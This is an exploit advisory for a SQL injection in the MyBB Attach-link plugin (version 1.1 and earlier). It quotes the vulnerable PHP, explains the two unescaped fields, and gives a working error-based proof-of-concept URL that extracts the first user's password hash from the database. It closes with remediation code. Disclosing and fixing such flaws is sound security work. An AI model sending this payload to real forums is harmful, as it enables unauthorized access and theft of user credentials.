MyBB Plugin Attach-link <= 1.1 SQL injection

# Exploit Title: MyBB Plugin Attach-link <= 1.1 SQL injection
# Date: 19/01/2013
# Exploit Author: Kallimero
# Vendor Homepage: http://mods.mybb.com/view/attach-link
# Version: 1.1
# Tested on: Debian



Vulnz
========

The MyBB plugin named Attach-link is vulnerable to a SQL injection.



---------------[inc/plugins/attachlink.php]---------------
<?php
function do_makeattachment($tpid)
{        
        global $mybb,$db,$tid,$linkattached;
        if(!$linkattached){
                // taken straight from the request; inserted below without escaping
                $posthash = $mybb->input['posthash'];
                $path_info = pathinfo($mybb->input['link_attachment_url']);
                
                if($mybb->input['link_attachment_size'])
                        $fsize=intval($mybb->input['link_attachment_size']);
                else
                        $fsize=remote_file_size($mybb->input['link_attachment_url']);
                
                if($mybb->input['link_attachment_name'])
                        $filename=$mybb->input['link_attachment_name'];
                else{
                        $filename=basename($mybb->input['link_attachment_url']);
                        if(strpos($filename,"?")!==FALSE)
                                $filename=substr($filename,0,strpos($filename,"?"));
                        $filename=urldecode($filename);
                }
                $filename=str_replace(array("'",'"','/','\\',':','*','?','<','>','|'),' ',$filename);
                
                $attacharray = array(
                        "pid" => $tpid,
                        "posthash" => $posthash,
                        "uid" => $mybb->user['uid'],
                        "filename" => $filename,
                        // extension comes straight from pathinfo() on user input; not escaped either
                        "filetype" => $path_info['extension'],
                        "filesize" => $fsize,
                        "attachname" => urlencode($mybb->input['link_attachment_url']),
                        "downloads" => 0,
                        "visible" => 1,
                        "dateuploaded" => TIME_NOW,
                        "atype" => 1
                );

                $aid = $db->insert_query("attachments", $attacharray);
                
                require_once MYBB_ROOT."inc/functions.php";
                update_thread_counters($tid, array("attachmentcount" => "+1"));
                $linkattached=1;
                return $aid;
        }
}
?>
---------------[inc/plugins/attachlink.php]---------------


Two fields are vulnerable: $posthash and $path_info['extension'].
The second one isn't that obvious, so let's explain:
the PHP function pathinfo() splits the path into parts (dirname, basename, filename, extension). Here it gets the extension.
But as there is no verification of the validity of the file (or any filter), anything can be supplied as the extension. Why not a SQL injection payload?
(It is limited, though, because the extension cannot contain a ".".)
But I'm a pretty lazy guy, so I'm going to inject in posthash.


Here is the PoC (error-based):
http://[site]/[path]/newreply.php?tid=1&link_attachment_url=trololo.php&link_attachment_size=1&link_attachment_name=lol&posthash=',(select 1 from (select count(*),concat((SELECT password FROM mybb_users LIMIT 0,1),0x7e, floor(rand(0)*3)) as e from information_schema.tables group by e) a))-- -



How to Fix ?
============


A simple $db->escape_string() on the vulnerable fields would fix it.
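As an added illustration of that fix (not the plugin's own code), here is a hardened version of the attachment-record construction from do_makeattachment() that validates and escapes the two fields above before they reach the INSERT. It assumes $db is MyBB's database object with escape_string(), and that a legitimate posthash is a 32-character hex string; the latter is an assumption about MyBB, not something the advisory states.

```php
<?php
// Added example, not the plugin's own code: hardened construction of the
// row that do_makeattachment() passes to $db->insert_query("attachments", ...).
// Assumptions: $db->escape_string() is available (named in the advisory);
// a valid posthash is a 32-char hex md5 (assumption about MyBB).
function build_attachment_record($mybb, $db, $tpid)
{
    $url = $mybb->input['link_attachment_url'];
    $path_info = pathinfo($url);

    // posthash: check the expected format first, then escape. Either step alone
    // stops the quote-based injection; together they also keep junk out of the table.
    $posthash = isset($mybb->input['posthash']) ? $mybb->input['posthash'] : '';
    if (!preg_match('/^[a-f0-9]{32}$/i', $posthash)) {
        return false; // reject the request rather than guess
    }
    $posthash = $db->escape_string($posthash);

    // extension: pathinfo() hands back whatever follows the last "." unchanged,
    // so restrict it to a short alphanumeric token and escape it as well.
    $ext = isset($path_info['extension']) ? $path_info['extension'] : '';
    if (!preg_match('/^[a-z0-9]{1,10}$/i', $ext)) {
        $ext = 'bin'; // unknown type; never let the raw value reach the query
    }
    $ext = $db->escape_string($ext);

    // The original only str_replace()'d/urlencode()'d these; escape them too.
    $filename = $db->escape_string(basename($url));
    $attachname = $db->escape_string(urlencode($url));

    return array(
        "pid"          => (int)$tpid,
        "posthash"     => $posthash,
        "uid"          => (int)$mybb->user['uid'],
        "filename"     => $filename,
        "filetype"     => $ext,
        "filesize"     => (int)$mybb->input['link_attachment_size'],
        "attachname"   => $attachname,
        "downloads"    => 0,
        "visible"      => 1,
        "dateuploaded" => TIME_NOW,
        "atype"        => 1,
    );
}

// Usage inside the plugin (remote_file_size() fallback omitted for brevity):
// $row = build_attachment_record($mybb, $db, $tpid);
// if ($row !== false) { $aid = $db->insert_query("attachments", $row); }
```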


Thanks
=========

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s. 
Please visit : http://hwc-crew.org/

(and as always, thanks for reading :p)

Groucho

